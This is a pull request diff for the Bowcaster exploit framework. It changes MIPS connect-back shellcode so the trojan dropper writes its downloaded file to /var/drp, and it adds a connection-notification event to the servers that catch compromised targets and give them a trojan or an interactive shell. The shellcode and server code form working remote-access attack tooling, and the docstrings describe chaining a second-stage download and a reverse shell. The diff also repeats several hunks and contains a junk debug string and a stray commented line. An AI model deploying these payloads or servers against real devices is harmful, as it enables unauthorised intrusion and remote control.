### PR TITLE
Add connected_event parameter to the ConnectbackServer and TrojanDropperServer and use /var for Trojan Dropper

### DIFF
--- a/src/bowcaster/payloads/mips/trojan_dropper_payload.py
+++ b/src/bowcaster/payloads/mips/trojan_dropper_payload.py
@@ -1,9 +1,10 @@
 # Copyright (c) 2013
 # - Zachary Cutlip <uid000@gmail.com>
+#p.add_string('K'*4)
 # - Tactical Network Solutions, LLC
-# 
+#
 # See LICENSE.txt for more details.
-# 
+#
 import string
 import socket
 import os
@@ -14,21 +15,21 @@ from ...common.support import BigEndian,LittleEndian
 class TrojanDropper:
     """
     This is a MIPS Linux connect-back payload that downloads and execs() a file.
-    
+
     It will establish a TCP connection to the specified port and address, read
-    off the socket to a file called "/tmp/drp", then exec() that file.
+    off the socket to a file called "/var/drp", then exec() that file.
     The file should be served as a raw stream of bytes.  When the server has
     sent the entire file, it should close the connection.
-    
+
     This payload can be used with TrojanServer to serve files to the target.
     Further, stage2dropper.c (in contrib) may be a useful companion trojan.
     """
     shellcodes={}
     shellcodes[LittleEndian] = string.join([
-        "\x6d\x70\x0f\x3c", # lui	t7,0x706d
-        "\x2f\x74\xef\x35", # ori	t7,t7,0x742f
+        "\x61\x70\x0f\x3c", # lui	t7,0x7061
+        "\x2f\x76\xef\x35", # ori	t7,t7,0x762f
         "\xf4\xff\xaf\xaf", # sw	t7,-12(sp)
-        "\x72\x70\x0e\x3c", # lui	t6,0x7072
+        "\x70\x70\x0e\x3c", # lui	t6,0x7070
         "\x2f\x64\xce\x35", # ori	t6,t6,0x642f
         "\xf8\xff\xae\xaf", # sw	t6,-8(sp)
         "\xfc\xff\xa0\xaf", # sw	zero,-4(sp)
@@ -86,7 +87,7 @@ class TrojanDropper:
     def __init__(self,connectback_ip,endianness,port=8080):
         """
         Class constructor.
-        
+
         Parameters:
         -----------
         connectback_ip: IP Address to connect back to.
@@ -94,12 +95,12 @@ class TrojanDropper:
                     (imported from bowcaster.common.support).
         port:   Optional parameter specifying TCP port to connect back to.
                 Defaults to 8080.
-                
+
         Attributes:
         -----------
         shellcode:  The string representing the payload's shellcode, ready to add
                     to an exploit buffer.
-        
+
         Notes:
         ------
         Currently only LittleEndian is implemented.

--- a/src/bowcaster/servers/connectback_server.py
+++ b/src/bowcaster/servers/connectback_server.py
@@ -1,9 +1,9 @@
 # Copyright (c) 2013
 # - Zachary Cutlip <uid000@gmail.com>
 # - Tactical Network Solutions, LLC
-# 
+#
 # See LICENSE.txt for more details.
-# 
+#
 import signal
 import socket
 import sys
@@ -21,9 +21,10 @@ class ConnectbackServer(object):
     connect-back payload and provides an interactive shell.  Think "netcat
     listener" that has an API and can be used programmatically.
     """
-    
+
     MAX_READ=1024
-    def __init__(self,connectback_ip,port=8080,startcmd=None,connectback_shell=True,logger=None):
+    def __init__(self,connectback_ip,port=8080,startcmd=None,connectback_shell=True,
+            logger=None,connected_event=None):
         """
         Class constructor.
 
@@ -37,7 +38,7 @@ class ConnectbackServer(object):
             service, or to customize the interactive shell, e.g., '/bin/sh -i'.
         connectback_shell: Optional.  This argument defaults to True, which is
             99% of the time is what you need.  See note.
-        logger: Optional.  A logger object is 
+        logger: Optional.  A logger object is
 
         Note
         ----
@@ -57,11 +58,12 @@ class ConnectbackServer(object):
         self.port=port
         self.startcmd=startcmd
         self.connectback_shell=connectback_shell
+        self.connected_event=connected_event
 
     def _handler(self,signum,frame):
         #print >>sys.stderr,"signal num %d\n"%signum
         self.keepgoing=False
-    
+
     def _setup_signals(self):
         self.keepgoing=True
         signal.signal(signal.SIGINT,self._handler)
@@ -75,7 +77,7 @@ class ConnectbackServer(object):
         serversocket.bind((self.connectback_ip,int(self.port)))
         serversocket.listen(5)
         return serversocket
-        
+
     def _exit(self):
         #this prevents a hang in mod_wsgi, which traps sys.exit()
         os.execv("/bin/true",["/bin/true"])
@@ -87,10 +89,14 @@ class ConnectbackServer(object):
         self.logger.LOG_INFO("Waiting for incoming connection.")
         self.keepgoing=True
 
-        
+
         (clientsocket,addess) = serversocket.accept()
 
         self.logger.LOG_INFO("Target has phoned home.")
+        if self.connected_event:
+            # let the caller know they have a connection
+            self.connected_event.set()
+
         fd_to_file={clientsocket.fileno:clientsocket,sys.stdin.fileno():sys.stdin}
         inputlist=[clientsocket,sys.stdin]
 
@@ -146,15 +152,15 @@ class ConnectbackServer(object):
         signal.signal(signal.SIGINT,signal.SIG_DFL)
         self.pid=None
         return status[1]
-    
+
     def shutdown(self):
         """
         Shut down the server.
-        
+
         This should only be necessary if the server has not yet received a
         connection (e.g., remote exploit failed)
         or when the remote end won't close the connection.
-        
+
         In the event the server has received a connection, it should shutdown
         gracefully when the connection is closed at the remote end.
         """
@@ -196,7 +202,7 @@ class ConnectbackServer(object):
                 except Exception as e:
                     self.logger.LOG_WARN("There was an error serving shell: %s" % str(e))
 
-                serversocket.shutdown(socket.SHUT_RDWR)                    
+                serversocket.shutdown(socket.SHUT_RDWR)
                 serversocket.close()
                 self._exit()
         else:
@@ -206,21 +212,22 @@ class ConnectbackServer(object):
 class TrojanServer(ConnectbackServer):
     """
     A server that supports the TrojanDropper payload.
-    
+
     This server will serve up each of a list of file provided to the constructor.
     At the end of the list, if connect_back_shell is True, it will serve a shell
     just like ConnectbackServer does.
-    
-    An ideal use case is to have the TrojanDropper download and execute a 
+
+    An ideal use case is to have the TrojanDropper download and execute a
     second stage payload, that in turn downloads another file (i.e. wget or nc)
     then pops a connect-back shell.
-    
+
     See stage2dropper.c in contrib for an example.
     """
-    def __init__(self,connectback_ip,files_to_serve,port=8080,startcmd=None,connectback_shell=False,logger=None):
+    def __init__(self,connectback_ip,files_to_serve,port=8080,startcmd=None,connectback_shell=False,
+            logger=None,connected_event=None):
         """
         Constructor.
-        
+
         Parameters
         ----------
         connectback_ip: the address this server should bind to.
@@ -233,19 +240,24 @@ class TrojanServer(ConnectbackServer):
             service, or to customize the interactive shell, e.g., '/bin/sh -i'.
         connectback_shell: Optional.  This argument defaults to True, which is
             99% of the time is what you need.  See note.
-        logger: Optional.  A logger object is 
-        
+        logger: Optional.  A logger object is
+
         """
         super(self.__class__,self).__init__(connectback_ip,port=port,startcmd=startcmd,
                                                 connectback_shell=connectback_shell,logger=logger)
         self.files_to_serve=files_to_serve
         self.connectback_shell=connectback_shell
+        self.connected_event=connected_event
 
 
     def _serve_file_to_client(self,filename,serversocket):
         data=open(filename,"r").read();
         (clientsocket,address) = serversocket.accept()
+
         clientsocket.send(data)
+
+        if self.connected_event:
+            self.connected_event.set()
 
         clientsocket.shutdown(socket.SHUT_RDWR)
         clientsocket.close()
@@ -264,7 +276,7 @@ class TrojanServer(ConnectbackServer):
         except Exception as e:
             self.logger.LOG_WARN("There was an error creating server socket: %s" % str(e))
             return None
-            
+
         self.pid=os.fork()
         if self.pid:
             return self.pid
@@ -279,7 +291,7 @@ class TrojanServer(ConnectbackServer):
             if self.connectback_shell == True:
                 self.logger.LOG_INFO("Serving connectback_shell.")
                 self._serve_connectback_shell(serversocket)
-            
+
             serversocket.shutdown(socket.SHUT_RDWR)
             serversocket.close()
             self._exit()

--- a/src/bowcaster/servers/connectback_server.py
+++ b/src/bowcaster/servers/connectback_server.py
@@ -1,9 +1,9 @@
 # Copyright (c) 2013
 # - Zachary Cutlip <uid000@gmail.com>
 # - Tactical Network Solutions, LLC
-# 
+#
 # See LICENSE.txt for more details.
-# 
+#
 import signal
 import socket
 import sys
@@ -21,9 +21,10 @@ class ConnectbackServer(object):
     connect-back payload and provides an interactive shell.  Think "netcat
     listener" that has an API and can be used programmatically.
     """
-    
+
     MAX_READ=1024
-    def __init__(self,connectback_ip,port=8080,startcmd=None,connectback_shell=True,logger=None):
+    def __init__(self,connectback_ip,port=8080,startcmd=None,connectback_shell=True,
+            logger=None,connected_event=None):
         """
         Class constructor.
 
@@ -37,7 +38,7 @@ class ConnectbackServer(object):
             service, or to customize the interactive shell, e.g., '/bin/sh -i'.
         connectback_shell: Optional.  This argument defaults to True, which is
             99% of the time is what you need.  See note.
-        logger: Optional.  A logger object is 
+        logger: Optional.  A logger object is
 
         Note
         ----
@@ -57,11 +58,12 @@ class ConnectbackServer(object):
         self.port=port
         self.startcmd=startcmd
         self.connectback_shell=connectback_shell
+        self.connected_event=connected_event
 
     def _handler(self,signum,frame):
         #print >>sys.stderr,"signal num %d\n"%signum
         self.keepgoing=False
-    
+
     def _setup_signals(self):
         self.keepgoing=True
         signal.signal(signal.SIGINT,self._handler)
@@ -75,7 +77,7 @@ class ConnectbackServer(object):
         serversocket.bind((self.connectback_ip,int(self.port)))
         serversocket.listen(5)
         return serversocket
-        
+
     def _exit(self):
         #this prevents a hang in mod_wsgi, which traps sys.exit()
         os.execv("/bin/true",["/bin/true"])
@@ -87,10 +89,14 @@ class ConnectbackServer(object):
         self.logger.LOG_INFO("Waiting for incoming connection.")
         self.keepgoing=True
 
-        
+
         (clientsocket,addess) = serversocket.accept()
 
         self.logger.LOG_INFO("Target has phoned home.")
+        if self.connected_event:
+            # let the caller know they have a connection
+            self.connected_event.set()
+
         fd_to_file={clientsocket.fileno:clientsocket,sys.stdin.fileno():sys.stdin}
         inputlist=[clientsocket,sys.stdin]
 
@@ -146,15 +152,15 @@ class ConnectbackServer(object):
         signal.signal(signal.SIGINT,signal.SIG_DFL)
         self.pid=None
         return status[1]
-    
+
     def shutdown(self):
         """
         Shut down the server.
-        
+
         This should only be necessary if the server has not yet received a
         connection (e.g., remote exploit failed)
         or when the remote end won't close the connection.
-        
+
         In the event the server has received a connection, it should shutdown
         gracefully when the connection is closed at the remote end.
         """
@@ -196,7 +202,7 @@ class ConnectbackServer(object):
                 except Exception as e:
                     self.logger.LOG_WARN("There was an error serving shell: %s" % str(e))
 
-                serversocket.shutdown(socket.SHUT_RDWR)                    
+                serversocket.shutdown(socket.SHUT_RDWR)
                 serversocket.close()
                 self._exit()
         else:
@@ -206,21 +212,21 @@ class ConnectbackServer(object):
 class TrojanServer(ConnectbackServer):
     """
     A server that supports the TrojanDropper payload.
-    
+
     This server will serve up each of a list of file provided to the constructor.
     At the end of the list, if connect_back_shell is True, it will serve a shell
     just like ConnectbackServer does.
-    
-    An ideal use case is to have the TrojanDropper download and execute a 
+
+    An ideal use case is to have the TrojanDropper download and execute a
     second stage payload, that in turn downloads another file (i.e. wget or nc)
     then pops a connect-back shell.
-    
+
     See stage2dropper.c in contrib for an example.
     """
     def __init__(self,connectback_ip,files_to_serve,port=8080,startcmd=None,connectback_shell=False,logger=None):
         """
         Constructor.
-        
+
         Parameters
         ----------
         connectback_ip: the address this server should bind to.
@@ -233,8 +239,8 @@ class TrojanServer(ConnectbackServer):
             service, or to customize the interactive shell, e.g., '/bin/sh -i'.
         connectback_shell: Optional.  This argument defaults to True, which is
             99% of the time is what you need.  See note.
-        logger: Optional.  A logger object is 
-        
+        logger: Optional.  A logger object is
+
         """
         super(self.__class__,self).__init__(connectback_ip,port=port,startcmd=startcmd,
                                                 connectback_shell=connectback_shell,logger=logger)
@@ -264,7 +270,7 @@ class TrojanServer(ConnectbackServer):
         except Exception as e:
             self.logger.LOG_WARN("There was an error creating server socket: %s" % str(e))
             return None
-            
+
         self.pid=os.fork()
         if self.pid:
             return self.pid
@@ -279,7 +285,7 @@ class TrojanServer(ConnectbackServer):
             if self.connectback_shell == True:
                 self.logger.LOG_INFO("Serving connectback_shell.")
                 self._serve_connectback_shell(serversocket)
-            
+
             serversocket.shutdown(socket.SHUT_RDWR)
             serversocket.close()
             self._exit()

--- a/src/bowcaster/servers/connectback_server.py
+++ b/src/bowcaster/servers/connectback_server.py
@@ -224,7 +224,8 @@ class TrojanServer(ConnectbackServer):
 
     See stage2dropper.c in contrib for an example.
     """
-    def __init__(self,connectback_ip,files_to_serve,port=8080,startcmd=None,connectback_shell=False,logger=None):
+    def __init__(self,connectback_ip,files_to_serve,port=8080,startcmd=None,connectback_shell=False,
+            logger=None,connected_event=None):
         """
         Constructor.
 
@@ -247,12 +248,17 @@ class TrojanServer(ConnectbackServer):
                                                 connectback_shell=connectback_shell,logger=logger)
         self.files_to_serve=files_to_serve
         self.connectback_shell=connectback_shell
+        self.connected_event=connected_event
 
 
     def _serve_file_to_client(self,filename,serversocket):
         data=open(filename,"r").read();
         (clientsocket,address) = serversocket.accept()
+
         clientsocket.send(data)
+
+        if self.connected_event:
+            self.connected_event.set()
 
         clientsocket.shutdown(socket.SHUT_RDWR)
         clientsocket.close()

--- a/src/bowcaster/servers/connectback_server.py
+++ b/src/bowcaster/servers/connectback_server.py
@@ -95,6 +95,7 @@ class ConnectbackServer(object):
         self.logger.LOG_INFO("Target has phoned home.")
         if self.connected_event:
             # let the caller know they have a connection
+            self.logger.LOG_INFO("asadfsa")
             self.connected_event.set()
 
         fd_to_file={clientsocket.fileno:clientsocket,sys.stdin.fileno():sys.stdin}


### PR DESCRIPTION
This allows callers to be notified when a connection is
received through a threading(or multiprocessing).Event that they can wait() on.

Use /var for the trojan dropper.
